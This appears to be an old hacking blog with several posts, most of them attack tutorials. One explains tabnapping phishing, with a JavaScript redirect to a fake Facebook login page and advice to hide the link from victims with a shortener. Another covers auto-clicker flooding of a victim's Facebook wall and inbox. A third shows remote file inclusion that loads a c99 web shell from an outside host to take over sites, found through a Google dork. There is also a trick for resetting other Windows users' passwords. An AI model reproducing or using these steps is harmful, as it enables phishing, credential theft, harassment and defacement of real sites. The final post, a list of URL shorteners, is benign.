Saturday, May 28, 2011

For this you need to be logged in to computer from any user account (means you are either member of Administrators or Users Group).

Now, follow the step by step instruction: -

  1. Go to RUN(Press window key + R) and type control userpasswords2

  2.Select the user you want to change the password.

  3. Click on Reset Password Tab (reset tab will only be available if the particular account have password)    And Reset the Password.
     YOU ARE  DONE :D.!!!

NOTE: - Above trick will not work if you are a user of Guests Group.




INTODUCTION:

Tab napping is new type of phishing scam that does not require you to click on any url to redirect you to the phishing site instead it relies on the fact that a lot of people used tabbed browsing(Opening multiple tabs while browsing).In tab napping one of your inactive tab is automatically replaced by with a new tab without your knowledge. Tab Napping is a type of phishing with smarter way to confuse the victim.For example Victim was viewing page A in a tab of a browser and then left this idle and now using some other website in another tab of browser. After some time the page A will automatically change to the phishing page. This is your phishing page. Idea is to confuse the victim in multiple tabs of browser.


now lets move on to the tutorial :
1. first we need a simple phishing setup that we have discussed before u can get ur phisher from here.click here

2. u will need ur hosting/blog/aur any webpage in which u can put the java script to sent its link to victim.

3. get ur java script frm here.

4.now u replace the link with your phishing page link in the java script from this line which comes in two places in the script

  timerRedirect = setInterval("location.href='http://facb00kloagin.my3gb.com/index.html'",10000); //set timed redirect

 5. after replacing it   Now, Select all & Copy Tab Napping script and you need to paste this code at the end of the real page html code(means above </html> ).

6.this script will not make any change on ur web page or blog page. 

  • This script will track the user actions and as soon as the blog will kept ideal ,
  • That script will redirect the victim to the phishing page your derived.
  • Now send this blog address to your victim or u can upload ur malicous webpage on a web hosting & then send the link to victim.

 7. now for more betterment u can shorten ur url  so that victim wont be able to know ur intentions get any url shortner from here

HERE IS A DEMO OF TABNAPPING PAGE:

  # Just Go  HERE and wait keep yourself idle for 10 sec. U will be redirected to my phishing page.
Note: This is illegal and is for educational purpose only. Any loss/damage happening will not be in any way our responsibility.

Tuesday, May 24, 2011


THINGS WE NEED:
1) A Facebook Account and a slave (of course)
2)
 Auto-Clicker (In this tutorial we will use Auto Clicker v2.2 by Shocker)
Download:
 You can download it at the Official Site

NOTE: Detections are false positives. If you don't trust me you can run it sandboxed.(the file is virus free)
[Image: offsite.png]
3) The most important is BRAIN and COMMON SENSE WhistleVictoire

INSTRUCTIONS:
1) Login to your Facebook account. Then after logging in, open another tab/window then go to "m.facebook.com" (without quotes)
[Image: mfacebook.png]
2) Go to friends, then type your slave's name then click Search. Now go to your slave's profile.
[Image: friendslast.png]
3) Now for the third step, I will cut this into 3 parts, Wallpost Flood, Comment Flood and Messaging Flood.

-Wallpost Flood-
 
1) 
Open Auto Clicker. Change the "Number of Clicks" to "9999". NOTE: Leave all the settings as it is exept the "Number of Clicks".
[Image: autoclicker.png]
2) Put your comment on the textbox. Then press F2. NOTE: Don't put your cursor on the "Post" button yet. Just place it in a blank space. Now after pressing F2, you will see the countdown of the Auto-Clicker at your taskbar.*see picture.
Autoclicker Countdown.

3) Now after you saw the progress of click at the taskbar (see picture) place your cursor on the "Post" button.
4) 
Now leave your cursor on the "Post" button while the Auto-Clicker runs. Leave it for atleast a minute.
5)
 Finished. You've just flooded his Wall.

-Comment Flood-
 
NOTE:
 In this tutorial we will Comment Flood a profile picture. But you can also use Comment Flooding in Wallposts and other posts/pics/vids that can be commented on. Just use your common sense on how to do it. Victoire
1) 
Open Auto Clicker. Change the "Number of Clicks" to "9999". NOTE: Leave all the settings as it is exept the "Number of Clicks".

2) Click your slave's profile picture.

3) Pick a photo you want to comment on. (You can use Next and Previous Button to Navigate to his other Profile Pics.)
4)
 Put your comment on the textbox. Then press F2. NOTE: Don't put your cursor on the "Comment" button yet. Just place it in a blank space. Now after pressing F2, you will see the countdown of the Auto-Clicker at your taskbar.*see picture.
Autoclicker Countdown 
5) Now after you saw the progress of click at the taskbar (see picture) place your cursor on the "Comment" button.
6) 
Now leave your cursor on the "Comment" button while the Auto-Clicker runs. Leave it for atleast a minute.
7)
 Finished. You've just comment flooded a profile picture of your slave :))

-Message Flood-
 
1) 
Open Auto Clicker. Change the "Number of Clicks" to "9999". NOTE: Leave all the settings as it is exept the "Number of Clicks".

2) Click "Messages" beside his profile picture.
 

3) Put anything in the "Subject" and "Body Message".

4) Then press F2. NOTE: Don't put your cursor on the "Send" button yet. Just place it in a blank space. Now after pressing F2, you will see the countdown of the Auto-Clicker at your taskbar.*see picture.

Autoclicker Countdown

5) Now after you saw the progress of click at the taskbar (see picture) place your cursor on the "Send" button.
6) 
Now leave your cursor on the "Send" button while the Auto-Clicker runs. Leave it for atleast a minute.
7)
 Finished! You've just flooded an Inbox of your slave.

Thursday, May 19, 2011

 I receive many E-mails on How To Hack websites so,
 today I will demonstrate how hackers use remote file inlcusion to deface websites.


Requirements
C99 shell


First of all visit google and type

"index.php?page="

This will show all the pages which have index.php?page=" in their url, RFI vulnerabilities only work on those sites which have index.php?page= in their url.


Now lets say that the website is as follows:


www.targetsite.com/index.php?page=something


so to check the vulnerability we will replace the something to Google
 or any other site now if Google homepage shows up in between the website this means that the website is vulnerable to the attack.The url will look like



                                                       
www.targetsite.com/index.php?page=www.google.com



Once we know that the website is vulnerable to the attack we will now include the c99 shell.To do it download the c99 shell and then upload it to a webhosting site such as  ripway,t35&many morer php webhostings .

Once the shell is uploaded you will have a unique url for your shell lets say it is
www.webhostingsite.com/c99.txt


Now to execute the shell in order to gain access to the website we will do as follows


http://www.targetsite.com/index.php?...e.com/c99.txt?


Dont forgett the "?" or else it wont be executed.


Remeber this does not work on all websites so the key is to try and try and try and try! 

the most important thing required is skills nd a vulnerability without vulnerability u  could do nothing. Also hide ur ip .
thnxx @devendra

Tuesday, May 17, 2011

A list of gud url shortners on Web..!!!


URL shortener
With the explosion of social media sites like Twitter � where concision matters the most � URL shortening services have become very important tools. In this article, I would like to share a list that I have compiled over the years. My favorite shorteners are bolded.
*As URL shortening services come and go, feel free to let me know which ones in this article are discontinued.*
  • 6URL.com: Customize URLs and hide affiliate links.
  • adf.ly:
  • Adjix: �Short Links. Tiny Ads. Big Payoff.� Requires you to open an account and comes with a browser bookmarklet.
  • Beam.to: You can password-protect your links.
  • bit.ly: One-click shortening service with a simple URL tracking feature and customization option. Comes with a browser bookmarklet.
  • blinky.me: �blinky.me is integrated with Sellebrity, giving you a world of analytics not available with any other URL shortener. With Sellebrity installed on your site, you�ll get piles of additional data about the people who click your links after they arrive at your site, something no other shortener can give you.�
  • BudURL: Paying service (starts at $8/month) that allows you to track where links are clicked in real time.
  • Cligs: �Cligs is 100% search engine friendly. We do NOT block any robots/bots/crawlers/spiders (whatever you want to call them). Also, Cligs uses 301 forwarding which is the most search engine friendly forwarding method recommended by Google, Yahoo!, and Microsoft.� The service comes with great tools.
  • DecentURL: �Making ugly URLS decent�. You need to open an account. The service also offers a browser bookmarklet.
  • DigBig: �DigBig is free, and for work-related purposes only. The service is actively monitored for abuse.�
  • Doiop: �Doiop creates for you a short URL with a keyword you choose, making it easy to remember or give away. This link will not break in emails and never expire.�
  • easyURL: Another customizable URL shortening service.
  • Google URL Shortener: Simple tool which creates 301(permanent) redirect URLs and stats.
  • ho.io: Another simple and customizable URL Shortener that comes with two types of browser bookmarklets.
  • HotRedirect: Choose from eight different domain names to shorten your long links.
  • is.gd: Create customizable shortened links and access stats with a click of your mouse.
  • Linkasa: �Shorter Safer Sweeter Links.� Another great service that allows you to see a temporary page before accessing the target website, and hence avoid bad surprises such as ads and inappropriate content.
  • Metamark: Password-protect your short URLs.
  • Moourl: �Welcome to the web�s cutest URL shortening service. If you have a really loooong URL, just paste it in the text field below, and we�ll milk it, creating a moourl for you. It lasts forever, It can be easily copied to your clipboard, and it�s really cute.� Also comes with a browser bookmarklet.
  • mx.vc: Shorten your long links and share on major social networking sites with a click of your mouse.
  • MyURL: Several alternative shortened links, affiliate link cloaking and link-protection for files hosted on some free file hosting websites.
  • Ne1: �We offer two types redirection modes: direct redirection and cloaked redirection where the target/true URL is hidden. All new accounts start as normal accounts with cloaked redirection with a small warning/ad frame at the top of the page.�
  • NotifyURL: Get an email the first time someone visits your new link.
  • notlong: Personalize the subdomain on your short link and password-protect your URL. Comes with a browser bookmarklet.
  • NutshellURL: No expiry date for your shortened link and you can use a personal name.
  • Ow.ly: Hootsuite�s shortener.
  • Profile.to: A URL shortener for Facebook profiles, groups and Fan Pages.
  • QT.vc: Register for a free account to shorten your links.
  • ShadyURL: �Don�t just shorten your URL, make it suspicious and frightening.�
  • Shim.net: Choose among seven domain names to personalize your shortened links.
  • Shorl: Another interesting URL shortening service.
  • ShortURL: Customizable subdomains, URL masking and traffic reports.
  • Shorty: �Shorty is a simple tool for creating shorter, human-readable links from long URLs. You install Shorty on your server, so the links you create with it never go away. You can also manage your links and see how often people click on them.�
  • Shrvl:  The service reduces your long links to 22 characters and can store any URL for later use.
  • SimURL: Embed the SimURL box on your website / blog to allow your visitors to shorten long URLs.
  • SnipURL: Another interesting service that offers features like URL sharing, profile pages, RSS feeds of latest Snips and password protection.
  • Su.pr: This service is provided by StumbleUpon.
  • TakeMe.to: Free for simple link shortening. Customization is provided for a small fee.
  • TightURL: A simple service with browser bookmarklet.
  • TINY.cc: Customize your links and access stats.
  • TinyFav: Share your favorite sites with people without sending them several different links.
  • TinyURL: Great URL shortening tool allowing customization and affiliate link masking. Comes with a browser bookmarklet.
  • TraceURL: Create short links and trace how many people click on them.
  • Tweetburner: Keep track of the links you share on Twitter and Friendfeed.
  • U2S � URL 2 Short: Link customization, password protection, expiry dates and stats.
  • Ulimit: �Ulimit is a domain name service that gives you a lifetime permanent address for your e-mail and Web site. This address is both reliable and easy to remember.�
  • URL.co.uk: Another simple URL shortening service.
  • URLcut: Password-protect and customize your shortened links.
  • url.ie: Another interesting URL shortening service with an appealing design. Features: QR barcodes and a browser bookmarklet.
  • Webalias: Choose from a list of 30 domain names to make your shortened link stand out!
  • Yep That URL: You can customize your shortened links with tags. The service also features QR barcodes and displays the top clicked links in its database.
  • Yourls: �YOURLS is a small set of PHP scripts that will allow you to run your own URL shortening service (� la TinyURL). You can make it private or public, you can pick custom keyword URLs, it comes with its own API.�
Do you use URL shorteners? If so, which are your favorites?